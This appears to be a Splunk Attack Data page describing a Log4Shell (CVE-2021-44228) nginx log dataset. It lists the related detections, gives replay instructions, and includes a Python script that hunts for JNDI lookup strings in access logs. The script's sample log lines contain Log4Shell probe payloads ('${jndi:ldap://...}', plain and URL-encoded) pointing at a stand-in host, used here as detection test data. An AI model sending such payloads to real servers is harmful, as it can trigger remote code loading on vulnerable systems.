Java

Description

Attack data related to Log4Shell CVE-2021-44228

MITRE ATT&CK Techniques

ID    | Technique                            | Tactic
T1190 | Exploit Public-Facing Application    | Initial Access

Environment Details

Field       | Value
Environment | attack_range
Directory   | java
Test Date   | 2021-12-13

Datasets

The following datasets were collected during this attack simulation:

Log4shell-Nginx

  • Path: /datasets/attack_techniques/T1190/java/log4shell-nginx.log
  • Sourcetype: nginx:plus:access
  • Source: nginx

The following detections in our security content repository use this attack data for testing:

Detection Name | Type | Source | MITRE ATT&CK | Analytic Story
Web or Application Server Spawning a Shell | TTP | Endpoint | T1190, T1133 | BlackByte Ransomware, CISA AA22-257A, CISA AA22-264A, Cleo File Transfer Software, Data Destruction, Flax Typhoon, GhostRedirector IIS Module and Rungan Backdoor, HAFNIUM Group, Hermetic Wiper, Log4Shell CVE-2021-44228, Microsoft SharePoint Vulnerabilities, Microsoft WSUS CVE-2025-59287, PHP-CGI RCE Attack on Japanese Organizations, ProxyNotShell, ProxyShell, SAP NetWeaver Exploitation, Spring4Shell CVE-2022-22965, SysAid On-Prem Software CVE-2023-47246 Vulnerability, WS FTP Server Critical Vulnerabilities
Linux Java Spawning Shell | TTP | Deprecated | T1190, T1133 | Data Destruction, Spring4Shell CVE-2022-22965, Hermetic Wiper, Log4Shell CVE-2021-44228
Hunting for Log4Shell | Hunting | Web | T1190, T1133 | Log4Shell CVE-2021-44228, CISA AA22-320A
Java Class File download by Java User Agent | TTP | Web | T1190 | Log4Shell CVE-2021-44228
Confluence Unauthenticated Remote Code Execution CVE-2022-26134 | TTP | Web | T1505, T1190, T1133 | Atlassian Confluence Server and Data Center CVE-2022-26134, Confluence Data Center and Confluence Server Vulnerabilities
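The web detections above (Hunting for Log4Shell in particular) run over the nginx access log in this dataset. The script below is an added example of that kind of check, not code from the Splunk security content repository: it parses nginx "combined"-format access log lines (an assumption about the dataset's log_format), URL-decodes the attacker-controlled fields that Log4j-based applications commonly log (request line, referer, user agent), and reports events containing the Log4Shell JNDI lookup marker. The three log lines and the host names in them are constructed for the example.

```python
import re
from urllib.parse import unquote

# Regex for the nginx "combined" access log format. Assumption: the dataset
# uses this layout; adjust the pattern if your nginx log_format differs.
NGINX_COMBINED = re.compile(
    r'(?P<remote_addr>\S+) - (?P<remote_user>\S+) \[(?P<time_local>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<body_bytes_sent>\S+) '
    r'"(?P<http_referer>[^"]*)" "(?P<http_user_agent>[^"]*)"'
)

# Client-controlled fields that web applications frequently pass to Log4j.
INSPECTED_FIELDS = ("request", "http_referer", "http_user_agent")


def normalize(value: str) -> str:
    """URL-decode twice (double-encoded values otherwise slip past a plain
    substring match) and lowercase so the check is case-insensitive."""
    decoded = value
    for _ in range(2):
        decoded = unquote(decoded)
    return decoded.lower()


def is_log4shell_indicator(value: str) -> bool:
    """True if the field carries the JNDI lookup marker after decoding."""
    return "${jndi:" in normalize(value)


def parse_line(line: str):
    """Return the access log fields as a dict, or None if the line does not
    match the expected format (malformed lines are skipped, not crashed on)."""
    m = NGINX_COMBINED.match(line)
    return m.groupdict() if m else None


def hunt(lines):
    """Scan an iterable of access log lines and return one finding per
    (line, field) pair that contains a Log4Shell indicator."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        event = parse_line(line)
        if event is None:
            continue
        for field in INSPECTED_FIELDS:
            if is_log4shell_indicator(event[field]):
                findings.append({
                    "line": lineno,
                    "field": field,
                    "remote_addr": event["remote_addr"],
                })
    return findings


# Constructed sample lines: one benign request, one probe in the User-Agent,
# one URL-encoded probe in the query string.
SAMPLE_LINES = [
    '203.0.113.10 - - [13/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [13/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://scanner.example/a}"',
    '203.0.113.30 - - [13/Dec/2021:10:00:03 +0000] '
    '"GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example%2Fa%7D HTTP/1.1" '
    '404 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LINES):
        print(finding)
```

To run it against the dataset itself, pass `open("log4shell-nginx.log")` to `hunt()` instead of `SAMPLE_LINES`. The parse step is separated from the indicator check so the same `hunt()` loop can be reused with a different regex if your nginx log_format adds or reorders fields.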

Usage Instructions

Replay with Splunk Attack Data

Replay attack data with replay.py from Splunk Attack Data.

  python replay.py --dataset /datasets/attack_techniques/T1190/java/log4shell-nginx.log --index attack_data

Manual Import

  1. Download the dataset files from the paths listed above
  2. Configure your Splunk instance with the appropriate sourcetypes
  3. Import the logs using the Splunk Add Data wizard

Find more detections and analytics for this attack technique in our security content repository.


Source: GitHub | Version: 1.0